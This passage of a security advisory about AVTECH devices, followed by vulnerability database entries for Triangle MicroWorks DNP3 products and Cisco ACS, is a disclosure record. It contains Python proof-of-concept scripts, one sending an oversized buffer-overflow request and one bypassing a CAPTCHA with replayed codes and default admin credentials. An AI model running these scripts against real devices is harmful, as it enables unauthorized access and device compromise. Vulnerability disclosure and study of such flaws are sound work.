             "/cgi-bin/user/Config.cgi?action=set&Network.SMTP.Receivers=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1")
resp = conn.getresponse()
print resp.read()
-----/
7.3. *CAPTCHA Bypass*
[CVE-2013-4982] The following Python proof of concept first sends a wrong
captcha (just to verify that captcha protection is enabled); then it
sends ten requests with an arbitrary hardcoded captcha and its matching
verification code. As a result, the captcha protection can be completely
bypassed.
/-----
import httplib
ip = "192.168.1.1"
print "Performing captcha replay with hardcoded wrong captcha code and verify code..."
conn = httplib.HTTPConnection(ip)
conn.request("GET",
             "/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUA&verify_code=FMUYyLOivRpgc HTTP/1.1")
resp = conn.getresponse()
print "Reading webpage..."
print resp.read()
print "Performing several captcha replays with hardcoded right captcha code and verify code..."
for i in range(1, 10):
    conn = httplib.HTTPConnection(ip)
    conn.request("GET",
                 "/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUF&verify_code=FMUYyLOivRpgc HTTP/1.1")
    resp = conn.getresponse()
    print "Reading webpage..."
    print resp.read()
-----/
8. *Report Timeline*
. 2013-08-06: Core Security Technologies attempts to contact vendor using the AVTECH official technical support contact page [2]. No reply received.
. 2013-08-12: Core attempts to contact vendor.
. 2013-08-20: Core attempts to contact vendor.
. 2013-08-28: After 3 attempts to contact vendor, the advisory CORE-2013-0726 is released as 'user release'.
9. *References*
[1] http://www.avtech.com.tw.
[2] http://www.avtech.com.tw/index.php?option=com_content&view=article&id=244&Itemid=453&lang=en.
| VAR-201309-0200 | CVE-2013-2793 | Multiple Triangle MicroWorks products denial of service (DoS) vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Triangle MicroWorks SCADA Data Gateway 2.50.0309 through 3.00.0616, DNP3 .NET Protocol components 3.06.0.171 through 3.15.0.369, and DNP3 C libraries 3.06.0000 through 3.15.0000 allow remote attackers to cause a denial of service (infinite loop) via a crafted DNP3 TCP packet. Triangle MicroWorks is a US-based company whose standalone and third-party component products communicate with peripheral/slave devices over various transport protocols (OPC Client, IEC 60870-6 (TASE.2/ICCP) Client, IEC 60870-5, DNP3, Modbus). Multiple Triangle MicroWorks products running on IP-connected devices do not correctly validate input; an attacker can submit a specially crafted TCP message that sends the software into an infinite loop, crashing the process and requiring a manual restart to restore normal operation. Multiple Triangle MicroWorks products are prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected device, denying service to legitimate users.
Note: This issue affects IP-connected devices. SDG (SCADA Data Gateway) is a set of supervisory control and data acquisition (SCADA) gateway products integrated into a server. DNP3 .NET Protocol components are a set of .NET Framework components that support DNP3. DNP3 ANSI C source code libraries are source code libraries based on the ANSI C standard.
| VAR-201309-0201 | CVE-2013-2794 | Multiple Triangle MicroWorks products denial of service (DoS) vulnerabilities |
CVSS V2: 4.9 CVSS V3: - Severity: MEDIUM |
Triangle MicroWorks SCADA Data Gateway 2.50.0309 through 3.00.0616, DNP3 .NET Protocol components 3.06.0.171 through 3.15.0.369, and DNP3 C libraries 3.06.0000 through 3.15.0000 allow physically proximate attackers to cause a denial of service (infinite loop) via crafted input over a serial line. Triangle MicroWorks is a US-based company whose standalone and third-party component products communicate with peripheral/slave devices over various transport protocols (OPC Client, IEC 60870-6 (TASE.2/ICCP) Client, IEC 60870-5, DNP3, Modbus). Multiple Triangle MicroWorks products are prone to a local denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected device, denying service to legitimate users.
NOTE: To exploit this issue, local access to the serial-based outstation is required. SDG (SCADA Data Gateway) is a set of supervisory control and data acquisition (SCADA) gateway products integrated into a server. DNP3 .NET Protocol components are a set of .NET Framework components that support DNP3. DNP3 ANSI C source code libraries are source code libraries based on the ANSI C standard.
| VAR-201308-0213 | CVE-2013-3466 | Cisco Secure Access Control Server EAP-FAST authentication module arbitrary command execution vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The EAP-FAST authentication module in Cisco Secure Access Control Server (ACS) 4.x before 4.2.1.15.11, when a RADIUS server configuration is enabled, does not properly parse user identities, which allows remote attackers to execute arbitrary commands via crafted EAP-FAST packets, aka Bug ID CSCui57636. The vendor has confirmed this vulnerability and tracks it as Bug ID CSCui57636. A third party may execute arbitrary commands via a crafted EAP-FAST packet.
Remote attackers can exploit this issue to execute arbitrary commands. This may facilitate a complete compromise of an affected device.
This issue is being tracked by Cisco Bug ID CSCui57636. When a RADIUS server configuration is enabled, the program does not correctly parse user identities